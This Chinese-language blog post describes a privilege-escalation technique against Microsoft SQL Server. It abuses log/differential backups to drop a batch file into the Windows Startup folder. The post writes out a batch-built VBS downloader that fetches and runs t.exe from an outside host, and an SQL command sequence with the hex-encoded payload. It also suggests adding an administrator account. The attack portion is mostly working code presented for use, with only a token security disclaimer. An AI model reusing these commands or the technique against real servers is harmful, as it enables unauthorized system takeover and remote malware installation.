提權思路之MSSQL差異備份取系統權限

原創 神馬文庫 2018-10-25 21:59

看了下面的文章,不是讓大家搞破壞,大家可以加強自己服務器的安全性。

MSSQL差異備份獲取webshell 幾乎人人皆知,那麼我們可以利用差異備份出來的文件 當作惡意代碼
讓系統執行了之後自動提升權限 或者添加管理員嗎? 答案當然可以了,kj021320測試了N次之後跟你說!

那麼我們得考慮文件擺放的位置~什麼地方系統會運行呢?這個其實算是廢話吧!
大家不用想都知道 通用地方 C:\Documents and Settings\All Users\「開始」菜單\程序\啓動
呵呵位置有了! 那麼我們備份什麼文件讓系統能執行的呢?
這個是第一個關鍵點~!
EXE JS VBS BAT這些文件大家第一時間想到的了
那些我一個一個來分析 exe的話!絕對能了! 但是 MSSQL差異備份這麼多垃圾肯定會把exe弄壞的!
否決掉
然後到腳本
VBS 我們能不能把 他的垃圾信息註釋掉呢? 不然VBS 會執行不了! OK 學過VBS的朋友都知道
VBS裏面 有2種註釋 ' 還有就是 rem
但是還是會有垃圾信息屏蔽不了
否決掉

JS呢? JS裏面有多行註釋的/**/ 但是 /* 不可能在首行吧?
否決掉

最後 剩下我們最熟悉的bat批處理了!
OK我們繼續分析 bat裏面註釋是什麼呢?也是REM,失敗啊!之前vbs那裏不行 這裏的rem註釋也一樣不行的!
那麼我們怎麼辦呢?其實很簡單! 當我們在CMD下面敲錯了命令系統會怎樣呢?

說到這裏 要是大家不往文章下面看也一樣能想到方法了吧~

OK我們繼續探~~這裏是最最關鍵點,差異備份出來的垃圾信息我們可以通過用回車把他提交了!
而系統只當作無用的命令來處理!不影響我們的操作!
問題就這樣解決了嗎?不是的!~MSSQL備份的時候,到一定的字符長度就會出現垃圾的字符,那個字符會影響我們的操作!
那麼我們得把語句儘量縮少,越少越好~
OK那我們思路好了就採用bat 寫一個VBS的下載者 然後執行這個下載者 最後通過下載者down回來的馬子來獲取系統權限
下面是我改過的生成下載者的BAT

echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs
echo P.Open "GET","http://www.isto.cn/t.exe",0 >>k.vbs
echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs
echo G.Mode=3:G.Type=1:G.Open() >>k.vbs 
echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs
k.vbs
t

下一個k.VBS然後k.vbs下載一個t.exe文件保存到本地 直接執行
記得記得我說過的代碼前面一定要用回車把垃圾數據提交 最好2以上個回車
然後實現差異備份

alter database ISTO set RECOVERY FULL--
create table cmd (a image)--
backup log ISTO to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D6963726F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D6372656174654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A6563686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A6B2E7662730D0A740D0A)--
backup log ISTO to disk = 'C:\Documents and Settings\All Users\「開始」菜單\程序\啓動\1.bat'--
drop table cmd--

OK bat出來了! 至於怎樣讓服務器重啓呢!這個問題遺留給你們去討論吧!
要是服務器直接開啓了3389 那就更方便了! 直接bat 一個添加管理員的命令更爽!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

提權

715434211 2019-02-23 00:05:57

windows 提權 cve-2018-8897

花樣年華軒 2019-02-22 23:31:42

域***提權之MS14-068

z2pp 2019-02-22 23:21:39

lvs fullnat部署手冊(四)相關配置篇

紫暝1127 2019-02-22 23:07:00

提權

winheaven 2019-02-22 20:58:49

DOS下如何提權

returnking 2019-02-22 16:38:00

windows提權

時間帶 2019-02-22 15:56:17

Horizon view7.7 (一) 基礎環境配置數據庫安裝

sword_111 2019-02-22 22:47:18

通過BCP導表數據的批處理

c6iz 2019-02-22 22:33:11

將MSSQL表數據轉成SQL語句

c6iz 2019-02-22 22:33:11

創建作業的SQL

c6iz 2019-02-22 22:33:05

Zabbix監控SQL Server數據庫

allmrys 2019-02-22 17:36:11

SQL表值函數

AlunE 2019-02-22 15:50:02

數據的三種備份方式詳解

心碎小胖子 2019-02-23 13:34:47

差異備份的恢復問題

神咖喱略 2019-02-22 12:56:23